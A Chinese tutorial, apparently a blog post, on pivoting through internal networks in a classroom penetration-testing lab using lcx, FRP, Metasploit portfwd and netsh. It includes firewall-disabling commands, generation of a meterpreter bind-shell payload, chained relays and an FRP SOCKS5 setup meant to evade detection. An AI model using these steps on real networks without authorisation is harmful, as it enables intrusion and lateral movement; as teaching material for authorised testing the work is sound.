2026/5/18 23:03:14
网站建设
项目流程
漯河做网站zrgu,wordpress返回旧版,长沙seo外包,网站 缓存什么时候使用内网渗透必备#xff1a;三种转发方式与实战工具全解析
一、前言
在内网渗透测试过程中#xff0c;我们常常会遇到目标服务端口被防火墙拦截、内网主机无法直接访问公网、需要通过跳板机横向移动等场景。此时#xff0c;内网转发技术就成为了突破网络限制、实现后续攻击的关…内网渗透必备三种转发方式与实战工具全解析一、前言在内网渗透测试过程中我们常常会遇到目标服务端口被防火墙拦截、内网主机无法直接访问公网、需要通过跳板机横向移动等场景。此时内网转发技术就成为了突破网络限制、实现后续攻击的关键手段。本文基于实际课堂演示环境详细讲解内网常见的三种转发方式端口转发、端口映射、代理转发的原理与适用场景并结合lcx、FRP、MSF portfwd等主流工具通过具体案例演示其实操流程。无论是新手入门还是老手巩固都能从本文中获取实用的内网转发技术要点助力顺利完成内网渗透测试工作。二、实验环境配置2.1 基础网络环境主机模式1设置第一个网段主机模式2设置第二个网段2.2 文章演示网段详细配置主机网段110.10.11.0/24DHCP分配范围128-254主机网段210.10.2.0/24DHCP分配范围128-254Kali攻击机地址192.168.61.251边界机配置双网卡192.168.61.248/10.10.11.130域内PC设置双网卡10.10.11.131/10.10.2.130域控PC设置10.10.2.2002.3 边界机业务特点边界PC的业务结构中可通过不同网段的IP访问相同的端口业务。三、内网常见三种转发方式原理3.1 端口转发适用于目标机器对某一端口的访问进行了限制的场景。可将本机的端口或本机可访问到的任意主机的端口转发到任意一台需要访问的公网IP上。3.2 端口映射将一个内网无法访问的端口映射到公网的某个端口进而实施攻击。例如常用的3389远程桌面端口。3.3 代理转发主要用于在目标机器上做跳板进而对内网其他主机实施攻击实现横向渗透是内网横向的核心技术。四、端口转发适用场景与核心工具实操4.1 端口转发适用场景当前端口无法正常访问要访问的端口未在防火墙中放行且关闭防火墙失败当前端口未进行映射对外的IP地址扫描结果中不存在该端口原理4.2 核心工具使用教程4.2.1 lcx端口转发工具使用前需先查看防火墙状态了解本地规则判断是否存在端口禁用情况。✅ 防火墙相关命令# 查看防火墙基础状态 netsh firewall show state # 查看防火墙全配置信息 netsh advfirewall show allprofiles # 开启防火墙 netsh advfirewall set allprofiles state on # 关闭防火墙 netsh advfirewall set allprofiles state off✅ lcx工具基本用法lcx.exe支持三种核心模式listen端口监听、tran端口映射、slave端口转发核心命令格式lcx.exe -listen|tran|slave option [-log logfile]各模式参数说明# 监听本机未占用的两个端口接收转发 -listen ConnectPort TransmitPort # 映射目标端口本地端口→目标IP目标端口 -tran ConnectPort TransmitHost TransmitPort # 转发端口公网主机IP/端口 → 内网主机IP/端口 -slave ConnectHost ConnectPort TransmitHost TransmitPort查看防火墙状态看本地有哪些规则是否在禁用某些端口netsh firewall show state netsh advfirewall show allprofiles启用和关闭方法netsh advfirewall set allprofiles state on #开启 netsh advfirewall set allprofiles state off #关闭实操案例案例1本地防火墙拦截3389端口但82端口开放将3389转发至本地82端口lcx.exe -tran 82 127.0.0.1 3389案例2肉鸡端口转发至攻击机本地访问肉鸡服务# 1. 攻击机本机监听两个端口51接收端口3389转发端口 lcx.exe -listen 51 3389 # 2. 肉鸡上运行转发命令将肉鸡3389转发至攻击机51端口 lcx.exe -slave 攻击机IP 51 肉鸡本机IP 3389 # 3. 攻击机本地访问127.0.0.1:3389即可连接肉鸡的3389端口案例3跨主机端口转发61.248的8080→61.13的888# 1. 源主机(192.168.61.248)运行转发程序 lcx.exe -slave 192.168.61.13 888 127.0.0.1 8080 # 2. 目标主机(192.168.61.13)监听端口 lcx.exe -listen 888 8080 # Linux环境下lcx写法 lcx -m 2 -p1 888 -p2 8080✅ 访问说明在192.168.61.13访问8080端口即可访问源主机的8080服务888为流量转发端口非服务端口渗透实战延伸正向木马lcx实现内网主机上线# 1. Kali生成Windows正向meterpreter木马监听4444端口 msfvenom -p windows/x64/meterpreter/bind_tcp lport4444 -f exe -o bind_4444.exe # 2. 木马拷贝至域内PC运行域内PC将监听4444端口 # 3. 域内PC运行lcx将4444转发至边界PC的11111端口 lcx.exe -slave 10.10.11.130 11111 127.0.0.1 4444 # 4. 边界PC监听11111转发至本地11112端口 lcx.exe -listen 11111 11112 # 5. Kali连接边界PC的11112获取域内PC会话 handler -H 192.168.61.248 -P 11112 -p windows/x64/meterpreter/bind_tcp⚠️ 注意上述方式稳定性差链接易断。边界PC的转发中会自动停止转发导致当前链接断开✅ 优化方案边界PC主动映射需关闭防火墙域内PC运行好木马后会监听本地的4444端口。此时用边界PC主动链接域内PC的4444然后做本地转发1、在边界PC中lcx.exe -tran 6667 10.10.11.131 4444 #注意当前需要关闭防火墙2、kali中建立和边界PC端口6667的链接获取到域内PC的shellhandler -H 192.168.61.248 -P 6667 -p windows/x64/meterpreter/bind_tcp4.2.2 FRP内网代理转发工具FRP是功能最强的内网穿透工具分为服务端frps.exe运行在跳板机/VPS和客户端frpc.exe运行在深层内网主机支持TCP/UDP/HTTP/Socks5等多种转发类型是内网横向渗透的首选工具。✅ 准备环境服务端文件frps.exefrps.ini跳板机/边界机运行客户端文件frpc.exefrpc.ini深层内网主机运行✅ 核心配置文件frpc.inifrps.ini 服务端配置文件 会在本地监听一个端口[common] # 服务端跳板机IP地址 server_addr 10.10.11.130 # 服务端监听端口必填默认7000 server_port 7000 # 日志文件路径 log_file ./frpc.log # 日志级别trace/debug/info/warn/error log_level info # 日志保留天数 log_max_days 3 # 认证令牌必须与服务端frps.ini一致 token 12345678 # 管理后台地址/端口/账号密码 admin_addr 127.0.0.1 admin_port 7400 admin_user admin admin_pwd admin # 预建立连接数 pool_count 5 # 启用TCP流多路复用提升稳定性 tcp_mux true # 通信协议 protocol tcp # 启用TLS加密防流量检测 tls_enable true # 示例1SSH端口转发内网22→公网6001 [ssh] type tcp local_ip 127.0.0.1 local_port 22 remote_port 6001 bandwidth_limit 1MB use_encryption false use_compression false # 示例2Socks5代理内网横向核心攻击机通过6005走跳板 [plugin_socks5] type tcp remote_port 6005 plugin socks5 plugin_user abc # Socks5认证账号 plugin_passwd abc # Socks5认证密码 # 示例3多端口范围转发 [range:tcp_port] type tcp local_ip 127.0.0.1 local_port 6010-6020,6022,6024-6028 remote_port 6010-6020,6022,6024-6028 use_encryption false use_compression false✅ FRP实操步骤将frps.exefrps.ini上传至跳板机边界PC10.10.11.130运行frps.exe服务端监听7000端口等待客户端连接。将frpc.exe配置好的frpc.ini上传至深层内网主机域内PC10.10.11.131运行frpc.exe客户端自动连接跳板机7000端口完成注册。跳板机边界PC中可以看到端口转发开启7005端口可以使用192.168.61.248攻击机192.168.61.251访问跳板机的映射端口如6005Socks5代理即可通过跳板机访问整个内网资源实现横向渗透。先做配置kali访问4.2.3 MSF自带工具portfwdportfwd是MSF的meterpreter会话自带的端口转发工具无需额外上传工具使用便捷适合应急转发场景。✅ 基本用法# 查看帮助文档 portfwd -h # 核心命令格式 portfwd [-h] [add | delete | list | flush] [args]核心参数说明-h查看帮助信息-i端口转发条目索引通过portfwd list查看-l本地监听端口正向/本地连接端口反向-L本地监听主机可选默认127.0.0.1-p远程目标端口-r远程目标主机IP-R启用反向端口转发实操案例案例1正向转发——将目标主机3389转发至攻击机本地3303端口# 在meterpreter会话中执行 portfwd add -L 127.0.0.1 -l 3303 -r 192.168.61.248 -p 3389✅ 访问方式攻击机本地执行rdesktop -u 用户名 -p 密码 127.0.0.1:3303即可连接目标主机3389。案例2反向转发——访问跳板机端口即可访问内网主机服务# 跳板机端口8809 → 内网主机10.10.11.131的8080端口 portfwd add -R -L 192.168.61.248 -l 8809 -r 10.10.11.131 -p 8080 #访问192.168.61.248的8809时即是在访问10.10.11.131的8080服务 [!] The remote host (-r) option is ignored for reverse port forwards. [*] Reverse TCP relay created: (remote) [::]:8080 - (local) 192.168.61.248:8809 meterpreter portfwd add -R -L 192.168.61.251 -l 8809 -r 192.168.61.248 -p 8080 #访问192.168.61.251的8809等于访问192.168.61.248的80804.2.4 扩展Windows自带netsh端口转发适用于无法上传第三方工具的严格环境利用Windows原生netsh实现端口转发无文件落地隐蔽性极强。# 核心命令将本地80端口转发至10.10.11.131的8080端口 netsh interface portproxy add v4tov4 listenport80 listenaddress0.0.0.0 connectport8080 connectaddress10.10.11.131 # 查看转发规则 netsh interface portproxy show all # 删除指定转发规则 netsh interface portproxy delete v4tov4 listenport80 listenaddress0.0.0.0 # 清空所有转发规则 netsh interface portproxy reset五、总结本文围绕内网渗透核心需求梳理了端口转发、端口映射、代理转发三种核心转发方式的原理与适用场景并基于课堂实验环境完整演示了lcx、FRP、MSF portfwd、netsh等工具的实操流程三种转发方式各有侧重✅ 端口转发突破单端口访问限制解决防火墙拦截问题✅ 端口映射实现内网端口公网暴露远程访问内网服务✅ 代理转发构建内网跳板支撑横向渗透核心需求。渗透实操核心要点先排查目标防火墙状态与端口规则按需选择转发工具优先使用系统自带工具netsh/portfwd减少操作痕迹必要时再用第三方工具lcx/FRP转发过程中关注链路稳定性避免因连接断开导致渗透失败FRP是内网渗透的终极工具优先掌握Socks5代理配置支撑内网全网段横向。后续拓展方向可进一步探索FRP高级配置HTTPS转发、P2P穿透、自定义插件、不同转发工具的组合使用场景以及转发流量的加密与防检测技巧提升内网渗透的灵活性与成功率。